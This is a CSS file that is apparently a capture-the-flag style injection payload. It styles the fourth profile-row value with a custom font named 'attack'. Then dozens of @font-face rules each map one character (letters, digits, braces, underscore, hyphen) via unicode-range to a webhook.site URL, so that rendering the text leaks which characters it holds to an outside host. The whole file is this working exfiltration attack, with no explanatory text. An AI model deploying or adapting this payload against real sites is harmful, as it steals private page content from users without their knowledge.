@charset "UTF-8";

.profile-info .profile-row:nth-child(4) .value {
    font-family: attack !important;
    font-size: 16px;
    display: inline;
}

@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?a');
    unicode-range: U+0061;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?b');
    unicode-range: U+0062;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?c');
    unicode-range: U+0063;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?d');
    unicode-range: U+0064;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?e');
    unicode-range: U+0065;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?f');
    unicode-range: U+0066;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?g');
    unicode-range: U+0067;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?h');
    unicode-range: U+0068;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?i');
    unicode-range: U+0069;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?j');
    unicode-range: U+006A;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?k');
    unicode-range: U+006B;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?l');
    unicode-range: U+006C;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?m');
    unicode-range: U+006D;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?n');
    unicode-range: U+006E;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?o');
    unicode-range: U+006F;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?p');
    unicode-range: U+0070;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?q');
    unicode-range: U+0071;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?r');
    unicode-range: U+0072;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?s');
    unicode-range: U+0073;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?t');
    unicode-range: U+0074;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?u');
    unicode-range: U+0075;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?v');
    unicode-range: U+0076;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?w');
    unicode-range: U+0077;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?x');
    unicode-range: U+0078;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?y');
    unicode-range: U+0079;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?z');
    unicode-range: U+007A;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?A');
    unicode-range: U+0041;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?B');
    unicode-range: U+0042;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?C');
    unicode-range: U+0043;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?D');
    unicode-range: U+0044;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?E');
    unicode-range: U+0045;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?F');
    unicode-range: U+0046;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?G');
    unicode-range: U+0047;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?H');
    unicode-range: U+0048;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?I');
    unicode-range: U+0049;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?J');
    unicode-range: U+004A;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?K');
    unicode-range: U+004B;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?L');
    unicode-range: U+004C;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?M');
    unicode-range: U+004D;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?N');
    unicode-range: U+004E;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?O');
    unicode-range: U+004F;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?P');
    unicode-range: U+0050;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?Q');
    unicode-range: U+0051;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?R');
    unicode-range: U+0052;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?S');
    unicode-range: U+0053;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?T');
    unicode-range: U+0054;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?U');
    unicode-range: U+0055;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?V');
    unicode-range: U+0056;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?W');
    unicode-range: U+0057;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?X');
    unicode-range: U+0058;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?Y');
    unicode-range: U+0059;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?Z');
    unicode-range: U+005A;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?0');
    unicode-range: U+0030;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?1');
    unicode-range: U+0031;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?2');
    unicode-range: U+0032;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?3');
    unicode-range: U+0033;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?4');
    unicode-range: U+0034;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?5');
    unicode-range: U+0035;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?6');
    unicode-range: U+0036;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?7');
    unicode-range: U+0037;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?8');
    unicode-range: U+0038;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?9');
    unicode-range: U+0039;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?%7B');
    unicode-range: U+007B;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?%7D');
    unicode-range: U+007D;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?_');
    unicode-range: U+005F;
}
@font-face {
    font-family: attack;
    src: url('https://webhook.site/e4e0eb38-45ad-4dcb-b55a-89fa68dc65a6/flag?-');
    unicode-range: U+002D;
}
